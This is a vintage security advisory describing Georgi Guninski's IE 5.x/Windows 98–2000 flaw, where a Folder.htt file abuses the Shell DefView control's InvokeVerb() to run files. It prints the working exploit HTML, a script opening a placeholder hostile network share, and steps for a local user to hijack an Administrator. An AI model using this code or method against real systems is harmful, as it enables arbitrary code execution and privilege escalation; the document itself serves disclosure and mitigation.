COMMAND

    IE

SYSTEMS AFFECTED

    Win systems

PROBLEM

    Georgi  Guninski  found  following  (Security  Advisory  #18).  IE
    5.5/5.x for Win98 may execute arbitrary files that can be accessed
    thru Microsoft Networking. Also local Administrator compromise  at
    least on default Windows 2000.

    Systems affected are:
    - For remote file execution: IE 5.5,5.x/Windows 98, the files must
      be accessible thru Microsoft Networking.
    - For  local  Administrator  compromise  on Windows 2000:  default
      Windows 2000 installation, not tested with IE 5.5 installed, but
      believe to work

    This  advisory  contains  two  issues,  but  since they use common
    ActiveX control and concept, so Georgi decided to post them in one
    advisory.

    I) IE 5.x may execute arbitrary programs when visiting a web page,
       reading HTML based mail with Outlook or simply browsing folders
       (that  may  be  remote)  as  web  pages  (which  is the default
       configuration for Windows).
   II)  Local  Administrator  compromise  on  default  installation of
       Windows  2000.   Have  not  tested  with  IE 5.5 installed, but
       believe to work.  In order to be compromised, the Administrator
       must open a local  folder as a web  page (which is the  default
       option when browsing folders).  In both cases a malicous person
       may take full control over user's computer/server.

    Browsing web sites and reading HTML mail may be dangerous, but  it
    turns out that browsing local or remote folders is also dangerous.
    The exploits use a feature of Windows 98/2000 that allows  viewing
    folders as web pages due to the integration of IE in the operating
    system.

    This  allows  putting  active  content  when browsing local/remote
    folder, which turns out to be dangerous.  The way the folder looks
    when  viewed  as  a  web  page  is controlled by a file Folder.htt
    located  in  the  folder,  which  is  a special HTML file that may
    contain Active Scripting and ActiveX Objects.  If you want to view
    the files in the folder, you must use an ActiveX Control  -  Shell
    DefView, which  basically contains  the functionality  of the  old
    Explorer.

    The Shell DefView Control has an interesting method -  InvokeVerb,
    which is used to perform actions with the currently selected  file
    -  for  example  showing  its  properties and the most interesting
    part - opening/executed it.

    It has a  string parameter -  the action to  perform on a  file or
    folder.  Microsoft has tried to  secure it - it yields a  security
    error if you pass an argument  to it and that is reasonable.   But
    amazingly, if  you just  do InvokeVerb()  with no  parameters - it
    executes the default action on  the file/folder and the action  is
    Open (Execute).

    So, to exploit this we create  a folder and place a malicous  file
    that we  want to  execute -  for example  "a.bat".   Also in  that
    folder, we put the active file Folder.htt.

    The code of Folder.htt:

        <html>
        <body>
        <script>
        setTimeout("f()",2000);
        function f() {
             FileList.focus();
             FileList.FocusedItem.InvokeVerb();
        }
        </script>
        <H1>Hello World<BR>Written by Georgi Guninski</H1>
        <object id=FileList border=0 tabindex=1
        classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2">
        </object>
        </body>
        </html>

    So what the  code does?   FileList.focus() focuses the  first file
    in our folder - in our example a.bat.  Note: a.bat may be not  the
    first file in our folder,  this depends on the arrangement  of the
    icons in the folder (default is by name).  But to circumvent  this
    we may put additional files with different  names/dates/extensions
    so whatever the  arrangement is, our  target file is  first in the
    list.   FileList.FocusedItem.InvokeVerb() does  the real  job - it
    opens(executes)  the  focused  file.   So  we  create a customized
    folder with malicous content,  place it somewhere probably  remote
    and wait or force a victim  to open it.  ac.zip for  demonstration
    is available at:

        http://www.nat.bg/~joro/ac.zip

    For I)  IE 5.x  may execute  arbitrary files  when visiting  a web
    page,  reading  HTML  based  mail  with Outlook or simply browsing
    folders (that may  be remote) as  web pages (which  is the default
    configuration for Windows).  To test it remotely with Windows  98:
    Unzip ac.zip  in a  UNC share  for example: \\HOSTILEUNCORIP\SHARE
    Browse \\HOSTILEUNCORIP\SHARE as a web page from IE.

    Or open a web page containing:

        <SCRIPT>
        window.open("\\\\HOSTILEUNCORIP\\SHARE");
        </SCRIPT>

    Note: Sometimes  the remote  test does  not work  the first  time.
    Try again (browse the folder again  or reload the web page) if  it
    does not work the first time.

    For II) Local Administrator compromise on default installation  of
    Windows 2000.  Have not tested with IE 5.5 installed, but  believe
    to work.  In order to be compromised, the Administrator must  open
    a local folder  as a web  page (which is  the default option  when
    browsing folders).   A local user  may create a  customized folder
    and if  the the  Administrator open  it as  a web  page (which  is
    default) then  the administrator  account is  compromised.   It is
    amazing that when  the Administrator opens  the folder a  security
    warning  "...may  be  unsafe...Do  you  want  to  allow  it  to be
    initialized  an  accessed  by  scripts?"  with  "Yes/No"  buttons.
    Whatever button  you choose,  the content  is executed.   This  is
    funny!

    As an ordinary user, unzip ac.zip in any folder, for example ac.

        1) Open ac from My Computer
        2) Select View->Customize this Folder->Next->Customize->Choose
           or edit...->Next
        3) Select Choose a template->Current->Next->Finish

    Wait for the Administrator to open the folder as a web page.

SOLUTION

    Do not browse folders as web pages.  Remote attack may be  stopped
    by  a  firewall  that  blocks  Microsoft  Networking  and  you are
    encouraged to confige firewall in such way.  But application holes
    must  be  fixed  at  application  level  and  not rely on firewall
    behavior!

    According to:

        http://msdn.microsoft.com/library/psdk/shellcc/shell/Shell_basics/Namespace.htm

    Users are unable  to create new  virtual folders.   FOLDER.HTT, or
    any  .HTT,  can  only  be  used  to alter the functionality of the
    default Web View  template of an  existing virtual folder.   Users
    are able  to install  new virtual  folders from  3rd partie.   The
    risks  presented  by  Georgi  in  his advisory #18 associated with
    modification/creation of FOLDER.HTT would appear to be limited  to
    Power Users and Administrators.

    Further,  possible   workarounds  involve   removing  the   MODIFY
    permissions  from  Power  Users  on  all  .HTT's  on  your systems
    (thereby limiting the possible exploit to Administrators).